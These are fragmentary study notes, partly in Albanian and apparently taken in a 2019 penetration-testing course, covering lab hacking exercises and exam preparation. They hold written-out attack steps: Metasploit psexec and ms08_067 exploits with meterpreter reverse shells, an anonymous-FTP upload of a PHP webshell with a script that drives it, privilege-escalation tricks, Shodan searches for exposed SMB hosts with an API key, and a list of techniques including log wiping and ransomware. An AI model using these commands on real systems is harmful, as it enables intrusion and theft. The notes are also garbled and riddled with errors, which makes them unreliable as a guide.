Product: ISR4221-SEC/K9 Description: Cisco ISR 4221 SEC Bundle with SEC lic Product: CON-SNT-ISR4221S Description: SNTC-8X5XNBD Cisco ISR 4221 SEC B https://www.amazon.de/JBC-Telefon-Uhr-Kleiner-Abenteurer/dp/B07MFZY6X9/ref=sr_1_10?keywords=smartwatch%2Bf %C3%BCr%2Bkinder&qid=1552766038&s=gateway&sr=8-10&th=1 Cisco Catalyst 3850-48 Switch with K9 IOS and 1 year smartnet ASA 5516-X with FirePOWER Services, 1 year smartnet Bit@shit-locker ============================================================================================= ============================================================================================= 09.01.2019 pen test? before pent test - understanding OS-s (not only win and Linux) services - vector of attack metoden per sulm red team - me gjet vull blue tram - me fix vull purple testing - mixed pen test... means capture the flag white box black box grey box scada systems aurora generator stage zero - mi kkuptu nevojat e ati biznesi passwd, shadow sudo unshadow /etc/passwd /etc/shadow crack hash -------- ftp, http 8080 vector of attack: anonymous ne ftp vsftpd 2.3.4 - Backdoor Command Execution me upload naj shell script me hide file ls command, me gjet file ----------------------------- msf5 > use auxiliary/scanner/smb/smb_enumshares msf5 auxiliary(scanner/smb/smb_enumshares) > show options msf5 auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 172.16.60.142 msf5 auxiliary(scanner/smb/smb_enumshares) > set THREADS 10 msf5 auxiliary(scanner/smb/smb_enumshares) > run msf5 > use auxiliary/scanner/smb/smb_login msf5 > use auxiliary/scanner/smb/smb_login>set smbuser msf5 > use auxiliary/scanner/smb/smb_login>set smbpass msf5 > use auxiliary/scanner/smb/smb_login>set RHOSTS 172.16.60.1/24 msf5 > use auxiliary/scanner/smb/smb_login>set THREADS 30 msf5 > use auxiliary/scanner/smb/smb_login>run > use exploit/windows/smb/psexec > use exploit/windows/smb/psexec>set smbuser > use exploit/windows/smb/psexec>set smbpass > use exploit/windows/smb/psexec>set payload windows/meterpreter/reverse_tcp > use exploit/windows/smb/psexec>set lhost 172.16.65.132 > use exploit/windows/smb/psexec>set rhost 172.16.60.73 > use exploit/windows/smb/ms08_067_netapi > set rhost 172.16.60.87 > set lhost 172.16.60.77 > set payload windows/meterpreter/reverse_tcp bitc admin cert util ============================================================================================= ============================================================================================= 06.02.2019 OSCP cert CEH cert CTF Capture the flag cissp certification Topic: miss configuration bad habbits me lon paths ex. /var/www/html - public folder /etc/appache2 - config i Apache vulnerability: file permission wrong configured https://dokuwiki.pejaime.com/lib/exe/fetch.php?media=dardan:f5:ms17-010-eternalblue7-2.pdf ============================================================================================= ============================================================================================= 08.02.2019 nmap -sU -p 161 172.16.15.15 snmpwalk -v 1 -c public target ip msf5 > use auxiliary/scanner/snmp/snmp_enum msf5 > use auxiliary/scanner/snmp/snmp_enumshares msf5 > use auxiliary/scanner/snmp/snmp_enumusers msf5 > use auxiliary/scanner/snmp/cisco_config_tftp msf5 > use auxiliary/scanner/snmp/cisco_upload_file ============================================================================================= ============================================================================================= 11.02.2019 Information Gathering Passive most important proccess of hacking permes 3rd parties, nuk rekomandohet drejt perdrejt -whois, tool dhe database -archive.org -theharverset -recon-ng -job portalet, merr info per sisteme permes job description -google hack Active -doomster diving -google hack (dorks) -dns recon, prej Ip e nxerr domain, -shodan ----------------------------- domain subdomain *domain extension .com .net ----------------------------- Faza 2 direkt Vector of Attack # pip2 install shodan www.shodan.io permes temp mail regjistrohesh ne shodan.io root@kali:~# shodan init ygxXXC1rOzk2VhqpzkmIWKHcR0Xypu2H ne search te shodan.io: country:"al" port:"445" os:"windows" search with IP ISP:"Kujtesa" shodan cli: # shodan host 84.22.59.42 ---------------------------------------------------------------- Weevely Usage weevely generate weevely [cmd] Description # git clone https://github.com/epinna/weevely3.git /weevely3# python weevely.py genereate 123 ~/Deskop/tt.py mv tt.pu to /var/www/htmp python weevely.py http://172.16.65.98/ # scp file.php user@ip.65.98:/home/userhome/ ### transfer kali to ubuntu apache2 server ============================================================================================= ============================================================================================= 13.02.2019 OSINT Framewarks https://osintframework.com/ Information Gathering domain: ickosovo.com Red Hawk Th3inspector BadKarma – Advance Network Reconnaissance Toolkit DMitry – Deepmagic Information Gathering Tool Devploit – Information Gathering Tool https://osintframework.com/ https://www.geocreepy.com/ ============================================================================================= ============================================================================================= 18.02.2019 nessus scan dradis - upload nessus exportet db to generate reports http://localhost:3000 cat file.csv | grep "172.16.1" | cut -d |," -f 5 | sort -u nmap -p- iL filename --- to scan from list nmap -iL filename --exclude 172.16.1.204 --- to exclude from result nmap -p- ip/24 >> scan_result nmap -p 21,22,23 ip/24 >> scan_result --- specific scan nmap -p- i172.16.1.19 --- 554 rtsp found install vlc Metasploit https://localhost:3790/ asdf 12345@tmp ============================================================================================= ============================================================================================= 20.02.2019 to identify file "what" target 172.16.65.165 $ strings what ### to understand if it is archive hint1: formula per tnt # gzip what $ gzip -d what.gz $ file what what: OpenDocument Text ============================================================================================= ============================================================================================= 22.02.2019 Cryptography ==SYMMETRIC== scitaly of sparta symetrik = ekcryp dhe decru=yp me qels te njejt Kerckhoff qysh me me ja dit algoritmin psh RSA, AES key ## substitution ciphers --- duhet me dite logjiken/algortmin e tableses a -> k b -> d c -> n AES-256 = quantom proof, milona vjet vyn ----------------------------------------------------- ## letter frequency analysis E 13% T 9% A 8% QU ----------------------------------------------------- ## scissor cipher if ABCDEF...XYZ ----------------------------------------------------- ##Affine cipher plus multiplyer Ex = Ax + Bxmod26 euclidean algorithm ----------------------------------------------------- ## vigenere ciphers ----------------------------------------------------- ## stream cipher & block cipher Encryptojm bita A5/1 RC4 T RNG P RNG middle square seed = ###block cipher Encryptojm blloqe DES - 16 her e key whitening, SHANON (confession ^ diffusion) AES, EBC, CBC ============================================================================================= ============================================================================================= 25.02.2019 /var/log/proftpd# tail -f /var/log/proftpd.log real time log logging tail -f /var/log/proftpd.log real time log logging /var/log/apache2# tail -f access.log iptables -L --line --- view by line iptables -D INPUT 3 --- to delete a line iptables -A INPUT -s 172.16.65.153 -p tcp --destination-port 80 -j DROP --- to add rule iptables -D INPUT -s 172.16.65.153 -p tcp --destination-port 80 -j DROP --- to delete rule # netstat -naop | grep ESTABLISHED # kill -9 1475 # lsof -n -i --- view all connections arp -a me na i pa IP jane ndrru IP jane clone IP tona screen procesi u hijeck ssh user@ip ============================================================================================= ============================================================================================= 27.02.2019 Targetr 172.16.65.136 # nmap 172.16.65.136 21/tcp open ftp 22/tcp open ssh 80/tcp open http # nmap -sV 172.16.65.136 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 21/tcp open ftp ProFTPD 1.3.5e 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) # dirb http://172.16.65.136 msf > search ProFTPD 1.3.5e # cd /usr/share/webshells/php/ root@kali:/usr/share/webshells/php# cp simple-backdoor.php dani.php # ftp 172.16.65.136 user/pass:anonymous/anonymous ftp> cd /var/www/html/ ftp> put dani.php http://172.16.65.136/dani.php http://172.16.65.136/dani.php?cmd=cmd qe dojm me execute nano ftp.py import requests while True: cmd = raw_input("> ") r = requests.get("http://172.16.65.136/simple-backdoor.php?cmd={}".format(cmd)) print r.text python ftp.py 172.16.65.136 $ ssh anonymous:anonymous@172.16.65.136 anonymous@digitalschool:/home/drinor$ cat .bash_history $ ssh drinor:Retro1@172.16.65.136 $ sudo su [sudo] password for drinor:Retro1 root@digitalschool:/home/drinor# :) ============================================================================================= ============================================================================================= 01.03.2019 LAB hostat qe jan me provu mi hack ============================================================================================= ============================================================================================= 04.03.2019 Build AdminFinder.py Wget.py /cget.exe kemi marr qasje me majt persistance vetem 22 qel cka kemi me bo add user user add /nuk krijon home dir /passwd kan /home, skan /bin/bash --------------------------------------- Backdoors|malware for specific systems: -/usr/share//webshells/: asp aspx cfm jsp perl php - $ service apache2 status --------------------------------------- web media files qysh me automatizu mi marr krejt files perniher >>>wget.download('http://127.0.0.1/all.zip ============================================================================================= ============================================================================================= 06.03.2019 Build Utilman ============================================================================================= ============================================================================================= 11.03.2019 exam complexity: recruite --- level 1 Flag te 10.20.20.13 me smb CA1{7SEkYLPrxEdvRcR} ============================================================================================= ============================================================================================= Finial EXAM shtune 10 27.04 dille 9:59 28.04 lab - complexity per 24 ore 10 - 11 machines pivoting web "no support prej njeri-tjetrit" before exam: meso para exam setup machine and tools johntheripper -- be sure lates version ============================================================================================= ============================================================================================= 15.03.2019 Target: 65.136 mkdir Voyager Files nmap 172.16.65.136 -p- #vetem open ports nmap -sS -sV -p22,80,2020 172.16.65.136 --- results here --- http://172.16.65.136:2020 method not allowed http://172.16.65.136 there is a foto, mmmm view source code - nothing :( there is a directory dirb or gobuster --- nothing only image folder http://172.16.65.136/img ----- there are some imgs mkdir img wget http://172.16.65.136/img/1.jpeg, 2.jpeg, 3.jepg --- to download steghide info 1.jpg steghide info 2.jpg ---mm there is something on it steghide extract -sf 2.jpg -- to extract #ls --- there is a file .py extracted nano voyager.py Flaskt ----lib is on there pranon post request requester need to send image/file 18:42 :46 --- komentimi i voyager.py id ps -aux linenum 2 users john bon base64 /home/john/cred -w 0 -- me marr file base64 extract #file cred cred: OpenDocument cred # libreoffice cred require password johntheripper is used here john.pot -- ketu i run ato qe hacked once #sudo ./john xxx e gjen passwordin e cred me qat user e pass provo ne web login ssh john@172.16.65.136 nano vayager.conf sudo -l sudo /usr/bin/lib/ IDS bypass scan methods: idle scan fragmented scan IDS e veren nmap scan DT - teknologji meshtrim , ex honeypot snort - IDS splank - log aggregator, plus pattern bilder elastic search --- run on no sql database, very fast alien voult carbon black silence endpoint protection - on cloud - salability - quarantine the inf. host ============================================================================================= ============================================================================================= 20.03.2019 sudo tcpdump net 10.0.20.0/24 -w logs.txt Target: 172.16.65.123 nmap 172.16.65.123 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-20 12:53 EDT Nmap scan report for 172.16.65.123 Host is up (0.0099s latency). Not shown: 989 closed ports PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 5357/tcp open wsdapi 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown ============================================================================================= ============================================================================================= 25.03.2019 target 172.16.65.73 nmap 172.16.65.73 nmap -sS -sV -p80, 172.16.65.73 dir http://172.16.65.73 echo xxxxxxx | base64 -d http://172.16.65.73/armageddon --- na jep private key nano ssh-key --- paste the key chmod 600 ssh-key ssh -i ssh-key armageddon@172.16.65.73 > :) # sudo -l User armageddon may run the following commands on armageddon: (root) NOPASSWD: /usr/bin/python nano shell.py import os import sys ('sudo su') # sudo /usr/bin/pytho shell.py # root :) ============================================================================================= ============================================================================================= 27.03.2019 Build netcat with malware included which will provide session ============================================================================================= ============================================================================================= 29.03.2019 snmptwlak nikto wpscan creeddump smbrelay netntlmex.py fingerprint.py incpacket pth load incognito ---- komanda proxychains socks 4a dex2jar apk tool apk sign tcpdump wireshark curl_user ----- local exploit ms12_020 ------- exploit rdesktop folder/file sharing domain hashdump me shadowcopy------------------------ koncept dll injection me msfvenom --------------------------- malicious dll subdomain bruteforce me wisler----------------------- cloudflair bypass nslookup revrselookup domain quaries me net komanada fileless attacks me regsvv serveo.net port forwardaing ssh shuttle port fowarding plink port forwarding ssh shuttle tunneling plink ssh tunnel burp captcha bypass sql injection me sqlmap cmd to sqlmap eavent log cleaner altrait data stream cron jobs task schedule reg add ubfiscation base32/64 encode decode esbsb encyption decryption setghide me krejt paketen pop3 brute force snmpt public dhe private string bruteforce xhydra hydra medusa ncrack netcat edhe nc file transfer netcat dhe nc bypass uac ask injection local exploits (metasploit) autoroute dhe static route reverse enginiering imunity debugger ovidebugger ransonmware simetric ecryption reverse ransomware local authetication bypas cmd stickykey injection linux init injection show mount (metasploit) enum filezila_server enum outlook enum skype export firefox history and data export chrome history and data decrypt saved password prive escelation me wget prive escelation me cat prive esc me vim and vi price esc me python hooks prive esc me pip prive esc me find kurnel exploit gcc compailer g++ compailer\ uncomplie 6 apache virtual host engen x mode ssl mode security php shell perl shell asp aspx shell veawly 3 smb clinet fing protocol smtp relay thc ipv6 attack thc ssl atack slow lories slow http test pyinstaller wine32/64 golang metasploit presistenc bits admin powershell url donwload cert util unicorne etherape permiscues mode mac changer big mac attack roge access point iot default creeds rtsp access me vlc jonthripper hashcat wordpress brutefoce me hashcat mode m400 dhe m500 jomlascan ----------- tool dropal enumeration